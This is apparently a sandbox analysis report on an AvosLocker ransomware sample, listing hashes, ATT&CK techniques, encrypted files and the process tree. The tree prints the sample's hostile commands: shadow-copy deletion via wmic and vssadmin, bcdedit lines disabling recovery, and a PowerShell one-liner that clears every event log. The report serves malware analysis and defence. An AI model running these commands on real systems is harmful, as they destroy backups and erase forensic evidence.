avoslocker | f9d9f113a6820af874e4c3a3ac90c001b157ddfeff76914b1f1e744be1d1f4f7

Analysis

max time kernel
25s
max time network
16s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29-12-2024 00:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sex.exe
Size

1.1MB
MD5

e3032317d2a145c136f058ec87c5fc1d
SHA1

b48e669d85ea84ba2741f4cf3f14266cfcb018ad
SHA256

f9d9f113a6820af874e4c3a3ac90c001b157ddfeff76914b1f1e744be1d1f4f7
SHA512

f5f0625abe1947ef17dccb052bdc5cad7a3fb85b0ca0a2ca74f41dcc810a01a13529c994c7be3377448ed833f71b65bc526923fdc0e18ca63bf0efa8bc14abb8
SSDEEP

24576:KImw98okVgela0as5CqLVO7XJCjkD3N0HRA:0L5ljasaU

Score

10^/10

avoslocker defense_evasion discovery evasion execution impact ransomware

Malware Config

Signatures

Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
ransomware avoslocker
Avoslocker family
avoslocker
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2520	bcdedit.exe
2508	bcdedit.exe

Renames multiple (10409) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Executes dropped EXE 1 IoCs

pid	Process
2696	hack.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	hack.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	hack.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1571927452.png"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212601.WMF	hack.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\IpsMigrationPlugin.dll.mui	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PAPER_01.MID	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\PREVIEW.GIF	hack.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\service.js	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\validation.js	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18198_.WMF	hack.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CAPSULES\CAPSULES.ELM	hack.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne	hack.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\picturePuzzle.html	hack.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\picturePuzzle.css	hack.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ta\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar	hack.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png	hack.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png	hack.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB4.BDR	hack.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_OFF.GIF	hack.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office64.en-us\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_flyout.png	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBCN6.CHM	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif	hack.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png	hack.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png	hack.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18236_.WMF	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216570.WMF	hack.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\it-IT\sqloledb.rll.mui	hack.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo	hack.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html	hack.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml	hack.exe
File created	C:\Program Files\DVD Maker\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\ARCTIC.INF	hack.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\THMBNAIL.PNG	hack.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png	hack.exe
File created	C:\Program Files\7-Zip\Lang\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR30F.GIF	hack.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Triedit\fr-FR\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\BloodPressureTracker.xltx	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18227_.WMF	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDEBARBB.DPV	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG	hack.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml	hack.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png	hack.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png	hack.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL086.XML	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02125_.WMF	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\THMBNAIL.PNG	hack.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe	hack.exe
File created	C:\Program Files\Java\jre7\bin\dtplugin\GET_YOUR_FILES_BACK.txt	hack.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6240	powershell.exe
2420	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hack.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3060	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2696	hack.exe
2420	powershell.exe
6240	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2696	hack.exe
Token: SeIncreaseQuotaPrivilege	2916	WMIC.exe
Token: SeSecurityPrivilege	2916	WMIC.exe
Token: SeTakeOwnershipPrivilege	2916	WMIC.exe
Token: SeLoadDriverPrivilege	2916	WMIC.exe
Token: SeSystemProfilePrivilege	2916	WMIC.exe
Token: SeSystemtimePrivilege	2916	WMIC.exe
Token: SeProfSingleProcessPrivilege	2916	WMIC.exe
Token: SeIncBasePriorityPrivilege	2916	WMIC.exe
Token: SeCreatePagefilePrivilege	2916	WMIC.exe
Token: SeBackupPrivilege	2916	WMIC.exe
Token: SeRestorePrivilege	2916	WMIC.exe
Token: SeShutdownPrivilege	2916	WMIC.exe
Token: SeDebugPrivilege	2916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2916	WMIC.exe
Token: SeRemoteShutdownPrivilege	2916	WMIC.exe
Token: SeUndockPrivilege	2916	WMIC.exe
Token: SeManageVolumePrivilege	2916	WMIC.exe
Token: 33	2916	WMIC.exe
Token: 34	2916	WMIC.exe
Token: 35	2916	WMIC.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeIncreaseQuotaPrivilege	2916	WMIC.exe
Token: SeSecurityPrivilege	2916	WMIC.exe
Token: SeTakeOwnershipPrivilege	2916	WMIC.exe
Token: SeLoadDriverPrivilege	2916	WMIC.exe
Token: SeSystemProfilePrivilege	2916	WMIC.exe
Token: SeSystemtimePrivilege	2916	WMIC.exe
Token: SeProfSingleProcessPrivilege	2916	WMIC.exe
Token: SeIncBasePriorityPrivilege	2916	WMIC.exe
Token: SeCreatePagefilePrivilege	2916	WMIC.exe
Token: SeBackupPrivilege	2916	WMIC.exe
Token: SeRestorePrivilege	2916	WMIC.exe
Token: SeShutdownPrivilege	2916	WMIC.exe
Token: SeDebugPrivilege	2916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2916	WMIC.exe
Token: SeRemoteShutdownPrivilege	2916	WMIC.exe
Token: SeUndockPrivilege	2916	WMIC.exe
Token: SeManageVolumePrivilege	2916	WMIC.exe
Token: 33	2916	WMIC.exe
Token: 34	2916	WMIC.exe
Token: 35	2916	WMIC.exe
Token: SeBackupPrivilege	3164	vssvc.exe
Token: SeRestorePrivilege	3164	vssvc.exe
Token: SeAuditPrivilege	3164	vssvc.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeSecurityPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeSecurityPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeSecurityPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeSecurityPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeSecurityPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeSecurityPrivilege	2420	powershell.exe
Token: SeBackupPrivilege	2420	powershell.exe
Token: SeSecurityPrivilege	2420	powershell.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 2696	2180	sex.exe	30
PID 2180 wrote to memory of 2696	2180	sex.exe	30
PID 2180 wrote to memory of 2696	2180	sex.exe	30
PID 2180 wrote to memory of 2696	2180	sex.exe	30
PID 2696 wrote to memory of 2736	2696	hack.exe	32
PID 2696 wrote to memory of 2736	2696	hack.exe	32
PID 2696 wrote to memory of 2736	2696	hack.exe	32
PID 2696 wrote to memory of 2736	2696	hack.exe	32
PID 2696 wrote to memory of 2680	2696	hack.exe	33
PID 2696 wrote to memory of 2680	2696	hack.exe	33
PID 2696 wrote to memory of 2680	2696	hack.exe	33
PID 2696 wrote to memory of 2680	2696	hack.exe	33
PID 2696 wrote to memory of 2672	2696	hack.exe	34
PID 2696 wrote to memory of 2672	2696	hack.exe	34
PID 2696 wrote to memory of 2672	2696	hack.exe	34
PID 2696 wrote to memory of 2672	2696	hack.exe	34
PID 2696 wrote to memory of 320	2696	hack.exe	35
PID 2696 wrote to memory of 320	2696	hack.exe	35
PID 2696 wrote to memory of 320	2696	hack.exe	35
PID 2696 wrote to memory of 320	2696	hack.exe	35
PID 2696 wrote to memory of 2968	2696	hack.exe	36
PID 2696 wrote to memory of 2968	2696	hack.exe	36
PID 2696 wrote to memory of 2968	2696	hack.exe	36
PID 2696 wrote to memory of 2968	2696	hack.exe	36
PID 2680 wrote to memory of 3060	2680	cmd.exe	37
PID 2680 wrote to memory of 3060	2680	cmd.exe	37
PID 2680 wrote to memory of 3060	2680	cmd.exe	37
PID 320 wrote to memory of 2520	320	cmd.exe	38
PID 320 wrote to memory of 2520	320	cmd.exe	38
PID 320 wrote to memory of 2520	320	cmd.exe	38
PID 2968 wrote to memory of 2420	2968	cmd.exe	39
PID 2968 wrote to memory of 2420	2968	cmd.exe	39
PID 2968 wrote to memory of 2420	2968	cmd.exe	39
PID 2736 wrote to memory of 2916	2736	cmd.exe	40
PID 2736 wrote to memory of 2916	2736	cmd.exe	40
PID 2736 wrote to memory of 2916	2736	cmd.exe	40
PID 2672 wrote to memory of 2508	2672	cmd.exe	41
PID 2672 wrote to memory of 2508	2672	cmd.exe	41
PID 2672 wrote to memory of 2508	2672	cmd.exe	41
PID 2696 wrote to memory of 6240	2696	hack.exe	46
PID 2696 wrote to memory of 6240	2696	hack.exe	46
PID 2696 wrote to memory of 6240	2696	hack.exe	46
PID 2696 wrote to memory of 6240	2696	hack.exe	46
PID 6240 wrote to memory of 5296	6240	powershell.exe	47
PID 6240 wrote to memory of 5296	6240	powershell.exe	47
PID 6240 wrote to memory of 5296	6240	powershell.exe	47
PID 6240 wrote to memory of 7032	6240	powershell.exe	48
PID 6240 wrote to memory of 7032	6240	powershell.exe	48
PID 6240 wrote to memory of 7032	6240	powershell.exe	48

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\sex.exe
"C:\Users\Admin\AppData\Local\Temp\sex.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Users\Admin\AppData\Local\Temp\hack.exe
  "C:\Users\Admin\AppData\Local\Temp\hack.exe"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\system32\cmd.exe
    cmd /c wmic shadowcopy delete /nointeractive
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete /nointeractive
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2916
- - C:\Windows\system32\cmd.exe
    cmd /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:3060
- - C:\Windows\system32\cmd.exe
    cmd /c bcdedit /set {default} recoveryenabled No
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2508
- - C:\Windows\system32\cmd.exe
    cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:320
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2520
- - C:\Windows\system32\cmd.exe
    cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:6240
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1571927452.png /f
      4⤵
      Sets desktop wallpaper using registry
      PID:5296
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
      4⤵
      PID:7032

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hack.exe

Filesize
807KB

MD5
e27b5291c8fb2dfdeb7f16bb6851df5e

SHA1
40207f83b601cd60905c1f807ac0889c80dfe33f

SHA256
ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f

SHA512
2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bb535e41df203ee183c947361890ada1

SHA1
02e3a710ce547550b2b4aa860631f3528e9bb081

SHA256
b96293ee147cad12ae6462b5444df7822fba2c6687d3891c359df6b4542607ef

SHA512
a2b74268a618e9316c7f5cbd6b2593046cc75c70a4f0ecde64116e2c609f2321295fddf4b3ebe4a9f86d55979662d940b6d22381a4ea96cff5495daba478d6eb

Download Submit
C:\Users\GET_YOUR_FILES_BACK.txt

Filesize
1011B

MD5
c92c2b70fb37f84aab38412ad9226aa8

SHA1
14f2e9a83285612d0a7b2c83b8f89bccfde6c154

SHA256
d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f

SHA512
04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848

Download Submit
memory/2180-5-0x000000013FFC0000-0x00000001400DF000-memory.dmp

Filesize
1.1MB

Download
memory/2420-926-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2420-795-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/6240-24571-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/6240-24572-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download